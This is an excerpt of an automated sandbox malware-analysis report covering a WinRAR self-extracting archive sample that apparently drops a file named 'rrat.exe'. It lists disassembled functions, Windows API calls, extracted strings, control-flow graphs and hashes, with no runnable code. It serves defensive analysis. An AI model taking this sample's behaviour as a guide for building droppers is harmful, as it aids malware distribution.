                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$B*$C:\Users\user\AppData\Local\Temp\RarSFX0$D+$STARTDLG$X+$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                              • API String ID: 3049964643-2342504919
                                                              • Opcode ID: 041517af24f22e49e11087fe996b4badc7f7d43a6315e0d69e02d033489bab4b
                                                              • Instruction ID: bf886f3208fdca4d644cebf7cb004a6984ef4a9c387350f1988d4f99cef0ca5a
                                                              • Opcode Fuzzy Hash: 041517af24f22e49e11087fe996b4badc7f7d43a6315e0d69e02d033489bab4b
                                                              • Instruction Fuzzy Hash: 5C61E671605344AFD710BB73EC8AF6B77E8EB59704F001029F609B62A2DA759D4DCB21
                                                              Function 00E82AF9 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00E82B22
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800), ref: 00E82B50
                                                              • GetLastError.KERNEL32(?,?,00000800), ref: 00E82B5C
                                                              • FindNextFileW.KERNEL32(?,?), ref: 00E82B86
                                                              • GetLastError.KERNEL32 ref: 00E82B92
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: c9216e40e23e5c1da2cdc7bb6c45e1f76ddd08742fb5c0c924273a48b46d52cd
                                                              • Instruction ID: d310679421d6dd814d4dbbe0ca577975367d725f51c287fa58051645a01d9b9c
                                                              • Opcode Fuzzy Hash: c9216e40e23e5c1da2cdc7bb6c45e1f76ddd08742fb5c0c924273a48b46d52cd
                                                              • Instruction Fuzzy Hash: 31415071901555AFCB25EF64CCC8AE9B3B8BB48350F14469AE96DF3200D734AE94CF50
                                                              Function 00E9C733 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000003,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002,00000000,?,00E9D6F2,00000003), ref: 00E9C754
                                                              • TerminateProcess.KERNEL32(00000000,?,00E9C709,00000003,00EB0A08,0000000C,00E9C860,00000003,00000002,00000000,?,00E9D6F2,00000003), ref: 00E9C75B
                                                              • ExitProcess.KERNEL32 ref: 00E9C76D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: ad0b5e8a4745587185dff4fc1bbe40cffa30bcc951bc7b088aa33b876d675f64
                                                              • Instruction ID: 2c05b8962c448f159a0ef34d43168c021fc013fb94f358a9a89bdca27ed91e46
                                                              • Opcode Fuzzy Hash: ad0b5e8a4745587185dff4fc1bbe40cffa30bcc951bc7b088aa33b876d675f64
                                                              • Instruction Fuzzy Hash: F0E04631000208AFCF017FA1DF48A483BA9EB59745F200015FA08AA121CB35EC46CA80
                                                              Function 00E90830 Relevance: 111.0, APIs: 49, Strings: 14, Instructions: 727windowfilesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E90835
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E90921
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E9093F
                                                              • IsDialogMessageW.USER32(?,?), ref: 00E90952
                                                              • TranslateMessage.USER32(?), ref: 00E90960
                                                              • DispatchMessageW.USER32(?), ref: 00E9096A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00E9098D
                                                              • EndDialog.USER32(?,00000001), ref: 00E909B0
                                                              • GetDlgItem.USER32(?,00000068), ref: 00E909D3
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E909EE
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00EA8574), ref: 00E90A01
                                                                • Part of subcall function 00E92491: _wcschr.LIBVCRUNTIME ref: 00E9249A
                                                                • Part of subcall function 00E92491: _wcslen.LIBCMT ref: 00E924BB
                                                              • SetFocus.USER32(00000000), ref: 00E90A08
                                                              • _swprintf.LIBCMT ref: 00E90A74
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                                • Part of subcall function 00E92512: GetDlgItem.USER32(00000068,00EE6300), ref: 00E92526
                                                                • Part of subcall function 00E92512: ShowWindow.USER32(00000000,00000005,?,?,?,00E90065,00000001,?,?,00E907F9,00EA9D3C,00EE6300,00EE6300,00001000,00000000,00000000), ref: 00E9254E
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E92559
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000C2,00000000,00EA8574), ref: 00E92567
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E9257D
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E92597
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E925DB
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E925E9
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E925F8
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E9261F
                                                                • Part of subcall function 00E92512: SendMessageW.USER32(00000000,000000C2,00000000,00EA8ECC), ref: 00E9262E
                                                              • GetLastError.KERNEL32(00000000,?), ref: 00E90AB8
                                                              • GetLastError.KERNEL32(?,00000000,?), ref: 00E90AE0
                                                              • GetTickCount.KERNEL32 ref: 00E90AFE
                                                              • _swprintf.LIBCMT ref: 00E90B12
                                                              • GetLastError.KERNEL32 ref: 00E90B44
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,?), ref: 00E90B93
                                                              • _swprintf.LIBCMT ref: 00E90BCC
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00E90C20
                                                              • GetCommandLineW.KERNEL32 ref: 00E90C3A
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00E90C97
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00E90CBF
                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00E90CF5
                                                              • Sleep.KERNEL32(00000064), ref: 00E90D09
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00E90D32
                                                              • CloseHandle.KERNEL32(00000000), ref: 00E90D3B
                                                              • _swprintf.LIBCMT ref: 00E90D6E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E90DCD
                                                              • SetDlgItemTextW.USER32(?,00000065,00EA8574), ref: 00E90DE4
                                                              • GetDlgItem.USER32(?,00000065), ref: 00E90DED
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E90DFC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E90E0B
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E90EB8
                                                              • _wcslen.LIBCMT ref: 00E90F0E
                                                              • _swprintf.LIBCMT ref: 00E90F38
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E90F82
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00E90F9C
                                                              • GetDlgItem.USER32(?,00000068), ref: 00E90FA5
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E90FBB
                                                              • GetDlgItem.USER32(?,00000066), ref: 00E90FD5
                                                              • SetWindowTextW.USER32(00000000,00ED0A42), ref: 00E90FF7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E9104C
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E9105F
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_00010600,00000000,?), ref: 00E91102
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00E911DC
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E9121E
                                                                • Part of subcall function 00E9177D: __EH_prolog.LIBCMT ref: 00E91782
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E91242
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l_wcschr
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$83$8$<$@$B$B*$D+$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                              • API String ID: 270980416-131512099
                                                              • Opcode ID: f38dc2a30636470563a9c2e4af49866bc80c146981b08fb5983f74b22579eee4
                                                              • Instruction ID: 310e6a4c3f462207fa24251432d4d911160d9341f5750c854de258fc370865b2
                                                              • Opcode Fuzzy Hash: f38dc2a30636470563a9c2e4af49866bc80c146981b08fb5983f74b22579eee4
                                                              • Instruction Fuzzy Hash: 5B423771941349BEEF21ABB19C89FBE37FCAB05704F401195F248BA1E2C7B55A49CB21
                                                              Function 00E9177D Relevance: 54.7, APIs: 24, Strings: 7, Instructions: 428windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 265 e9177d-e91795 call e93a94 call e93ac0 270 e9244b-e92456 265->270 271 e9179b-e917c5 call e90354 265->271 271->270 274 e917cb-e917d0 271->274 275 e917d1-e917df 274->275 276 e917e0-e917f5 call e900f6 275->276 279 e917f7 276->279 280 e917f9-e9180e call e87d24 279->280 283 e9181b-e9181e 280->283 284 e91810-e91814 280->284 286 e91824 283->286 287 e92417-e92442 call e90354 283->287 284->280 285 e91816 284->285 285->287 289 e9182b-e9182e 286->289 290 e91aba-e91abc 286->290 291 e91a9d-e91a9f 286->291 292 e919fc-e919fe 286->292 287->275 298 e92448-e9244a 287->298 289->287 297 e91834-e9188e call e8f86d call e83793 call e829a2 call e82adc call e81ac3 289->297 290->287 295 e91ac2-e91ac9 290->295 291->287 293 e91aa5-e91ab5 SetWindowTextW 291->293 292->287 296 e91a04-e91a10 292->296 293->287 295->287 299 e91acf-e91ae8 295->299 300 e91a12-e91a23 call e9c007 296->300 301 e91a24-e91a29 296->301 353 e919cd-e919e2 call e82a2f 297->353 298->270 303 e91aea 299->303 304 e91af0-e91afe call e98793 299->304 300->301 307 e91a2b-e91a31 301->307 308 e91a33-e91a3e call e904ce 301->308 303->304 304->287 322 e91b04-e91b0d 304->322 309 e91a43-e91a45 307->309 308->309 316 e91a50-e91a70 call e98793 call e9aa36 309->316 317 e91a47-e91a4e call e98793 309->317 342 e91a89-e91a8b 316->342 343 e91a72-e91a79 316->343 317->316 326 e91b0f-e91b13 322->326 327 e91b36-e91b39 322->327 328 e91b3f-e91b42 326->328 329 e91b15-e91b1d 326->329 327->328 331 e91c1e-e91c2c call e868cd 327->331 336 e91b4f-e91b6a 328->336 337 e91b44-e91b49 328->337 329->287 334 e91b23-e91b31 call e868cd 329->334 344 e91c2e-e91c42 call e958cb 331->344 334->344 354 e91b6c-e91ba6 336->354 355 e91bb4-e91bbb 336->355 337->331 337->336 342->287 345 e91a91-e91a98 call e987ae 342->345 349 e91a7b-e91a7d 343->349 350 e91a80-e91a88 call e9c007 343->350 364 e91c4f-e91ca0 call e868cd call e901f1 GetDlgItem SetWindowTextW SendMessageW call e9a890 344->364 365 e91c44-e91c48 344->365 345->287 349->350 350->342 371 e919e8-e919f7 call e829b8 353->371 372 e91893-e918a7 SetFileAttributesW 353->372 388 e91ba8 354->388 389 e91baa-e91bac 354->389 358 e91be9-e91c0c call e98793 * 2 355->358 359 e91bbd-e91bd5 call e98793 355->359 358->344 393 e91c0e-e91c1c call e868a5 358->393 359->358 375 e91bd7-e91be4 call e868a5 359->375 399 e91ca5-e91ca9 364->399 365->364 370 e91c4a-e91c4c 365->370 370->364 371->287 377 e9194d-e9195d GetFileAttributesW 372->377 378 e918ad-e918e0 call e83470 call e8316f call e98793 372->378 375->358 377->353 386 e9195f-e9196e DeleteFileW 377->386 409 e918f3-e91901 call e83754 378->409 410 e918e2-e918f1 call e98793 378->410 386->353 392 e91970-e91973 386->392 388->389 389->355 396 e91977-e919a3 call e839a9 GetFileAttributesW 392->396 393->344 405 e91975-e91976 396->405 406 e919a5-e919bb MoveFileW 396->406 399->287 404 e91caf-e91cc3 SendMessageW 399->404 404->287 405->396 406->353 408 e919bd-e919c7 MoveFileExW 406->408 408->353 409->371 415 e91907-e91947 call e98793 call e94bd0 SHFileOperationW 409->415 410->409 410->415 415->377
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E91782
                                                                • Part of subcall function 00E90354: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E9043B
                                                                • Part of subcall function 00E900F6: _wcschr.LIBVCRUNTIME ref: 00E90191
                                                              • _wcslen.LIBCMT ref: 00E91A48
                                                              • _wcslen.LIBCMT ref: 00E91A51
                                                              • SetWindowTextW.USER32(?,?), ref: 00E91AAF
                                                              • _wcslen.LIBCMT ref: 00E91AF1
                                                              • _wcsrchr.LIBVCRUNTIME ref: 00E91C39
                                                              • GetDlgItem.USER32(?,00000066), ref: 00E91C74
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00E91C84
                                                              • SendMessageW.USER32(00000000,00000143,00000000,00ED0A42), ref: 00E91C92
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E91CBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$@4$B$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$T4
                                                              • API String ID: 986293930-2881898191
                                                              • Opcode ID: e1e2b125ff9f68998416021a8b8fa917dafeed6f75e764c1464ed029eceddc46
                                                              • Instruction ID: aeb1c43717166c8031c17ae9cd4b02d583dae13a724bcc42f81ff63a7f70bce4
                                                              • Opcode Fuzzy Hash: e1e2b125ff9f68998416021a8b8fa917dafeed6f75e764c1464ed029eceddc46
                                                              • Instruction Fuzzy Hash: ABE17072900259AADF24EBA0DD85EEE73FCAF05314F5050A6F649F7051EB749E84CB60
                                                              Function 00E86B8F Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 420 e86b8f-e86bb2 call e93ac0 GetModuleHandleW 423 e86c13-e86e74 420->423 424 e86bb4-e86bcb GetProcAddress 420->424 425 e86e7a-e86e85 call e9bf0d 423->425 426 e86f40-e86f6c GetModuleFileNameW call e83887 call e868cd 423->426 427 e86bcd-e86be3 424->427 428 e86be5-e86bf5 GetProcAddress 424->428 425->426 437 e86e8b-e86eb9 GetModuleFileNameW CreateFileW 425->437 443 e86f6e-e86f7a call e82c72 426->443 427->428 431 e86c11 428->431 432 e86bf7-e86c0c 428->432 431->423 432->431 440 e86ebb-e86ec7 SetFilePointer 437->440 441 e86f34-e86f3b CloseHandle 437->441 440->441 444 e86ec9-e86ee5 ReadFile 440->444 441->426 449 e86fa9-e86fd0 call e83942 GetFileAttributesW 443->449 450 e86f7c-e86f87 call e86b47 443->450 444->441 446 e86ee7-e86f0c 444->446 448 e86f29-e86f32 call e865fa 446->448 448->441 455 e86f0e-e86f28 call e86b47 448->455 458 e86fda 449->458 459 e86fd2-e86fd6 449->459 450->449 461 e86f89-e86fa7 CompareStringW 450->461 455->448 463 e86fdc-e86fe1 458->463 459->443 462 e86fd8 459->462 461->449 461->459 462->463 465 e87018-e8701a 463->465 466 e86fe3 463->466 468 e87020-e87037 call e838d1 call e82c72 465->468 469 e87127-e87131 465->469 467 e86fe5-e8700c call e83942 GetFileAttributesW 466->467 474 e8700e-e87012 467->474 475 e87016 467->475 479 e87039-e8709a call e86b47 * 2 call e84c77 call e839a9 call e84c77 call e8fa04 468->479 480 e8709f-e870d2 call e839a9 AllocConsole 468->480 474->467 478 e87014 474->478 475->465 478->465 485 e8711f-e87121 ExitProcess 479->485 480->485 486 e870d4-e87119 GetCurrentProcessId AttachConsole call e98793 GetStdHandle WriteConsoleW Sleep FreeConsole 480->486 486->485
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00E86BA8
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E86BBA
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E86BEB
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E86E95
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E86EAF
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E86EBF
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00EA8828,00000000), ref: 00E86EDD
                                                              • CloseHandle.KERNEL32(00000000), ref: 00E86F35
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E86F4A
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00EA8828,?,00000000,?,00000800), ref: 00E86F9E
                                                              • GetFileAttributesW.KERNEL32(?,?,00EA8828,00000800,?,00000000,?,00000800), ref: 00E86FC8
                                                              • GetFileAttributesW.KERNEL32(?,?,00EA88F0,00000800), ref: 00E87004
                                                                • Part of subcall function 00E86B47: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                                • Part of subcall function 00E86B47: LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              • _swprintf.LIBCMT ref: 00E87076
                                                              • _swprintf.LIBCMT ref: 00E870C2
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • AllocConsole.KERNEL32 ref: 00E870CA
                                                              • GetCurrentProcessId.KERNEL32 ref: 00E870D4
                                                              • AttachConsole.KERNEL32(00000000), ref: 00E870DB
                                                              • _wcslen.LIBCMT ref: 00E870F0
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E87101
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00E87108
                                                              • Sleep.KERNEL32(00002710), ref: 00E87113
                                                              • FreeConsole.KERNEL32 ref: 00E87119
                                                              • ExitProcess.KERNEL32 ref: 00E87121
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 1207345701-3298887752
                                                              • Opcode ID: 8dd3b15a97a32d9dda9ca555622d146d7e920c2a9cb425454f3e94258a8d1078
                                                              • Instruction ID: ab2a60b7cbc3734a363e2b979f3b18a56cf766844b1d65b6dfa4604bda78bf67
                                                              • Opcode Fuzzy Hash: 8dd3b15a97a32d9dda9ca555622d146d7e920c2a9cb425454f3e94258a8d1078
                                                              • Instruction Fuzzy Hash: 23D177B15093849FD760AF509A4AA9FB6E8FBCA704F50291DF18DBA150DF70A508CB63
                                                              Function 00E8816F Relevance: 31.1, APIs: 3, Strings: 14, Instructions: 1313COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: AES-0017$D+$D+$D+$D+$D+$D+$D+$D+$rrat.exe$z01$zip$zipx$zx01
                                                              • API String ID: 3519838083-70252433
                                                              • Opcode ID: 0f8bed308186beb289f56b79f3ae3ad0591fbfb07c198bdbed509228ac140205
                                                              • Instruction ID: 305925ba9ffbf0a8b0e9ed0ab230dd9f7aa2431364328749a2c3df19e05e4768
                                                              • Opcode Fuzzy Hash: 0f8bed308186beb289f56b79f3ae3ad0591fbfb07c198bdbed509228ac140205
                                                              • Instruction Fuzzy Hash: 63B28F71904214DFCB24EF69DE81AA97BE5BB48308F54212AFC0DF72A1DB329D46CB50
                                                              Function 00E840C7 Relevance: 25.2, APIs: 5, Strings: 9, Instructions: 663COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E840D0
                                                              • _wcschr.LIBVCRUNTIME ref: 00E840F1
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E8410C
                                                                • Part of subcall function 00E83887: _wcslen.LIBCMT ref: 00E8388F
                                                                • Part of subcall function 00E868A5: _wcslen.LIBCMT ref: 00E868AB
                                                                • Part of subcall function 00E878FD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E83539,00000000,?,?), ref: 00E87919
                                                              • _wcslen.LIBCMT ref: 00E84449
                                                              • __fprintf_l.LIBCMT ref: 00E8457C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                              • API String ID: 557298264-801612888
                                                              • Opcode ID: 059e6147efbbf125e4eb6b7bd8385935f17d19f9effc735caae15f96c34e001b
                                                              • Instruction ID: 8510f2b61ad9705e28c56010fe44f7e5229565b9f934c776aef5f00fb30b024c
                                                              • Opcode Fuzzy Hash: 059e6147efbbf125e4eb6b7bd8385935f17d19f9effc735caae15f96c34e001b
                                                              • Instruction Fuzzy Hash: 0032D0B190021AABDF29FF64C841AEE77A5FF05704F40612AF90DB72D1EB719984CB90
                                                              Function 00E92512 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                              Download Yara Rule

